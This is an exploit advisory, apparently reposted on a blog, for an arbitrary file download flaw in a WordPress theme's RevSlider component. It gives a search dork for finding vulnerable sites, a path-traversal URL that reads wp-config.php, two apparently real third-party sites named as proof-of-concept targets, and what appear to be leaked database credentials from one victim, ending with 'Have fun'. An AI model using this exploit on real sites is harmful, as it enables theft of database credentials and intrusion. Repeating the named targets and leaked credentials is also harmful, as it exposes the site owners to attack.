Wednesday, January 21, 2015

WordPress Ultimate Theme Arbitrary File Download

# WordPress Ultimate Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://www.techerhut.com/download-x-v1-7-5-the-ultimate-wordpress-theme-themeforest/
# Tested on: Windows 7 and GNU/Linux
# Google Dork: "Index of" +/wp-content/themes/ultimate/
# Vulnerable path: /wp-content/themes/ultimate/
# Exploit (RevSlider):
  • http://vitima/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# PoC :
  • http://iai.pt/wp/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • http://www.wanderlogic.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Example config.php
  • define('DB_USER', 'admincom1');
  • define('DB_PASSWORD', '!J5XnVsc%');
  • define('DB_HOST', 'mysql.admincom.com.br');
Have fun

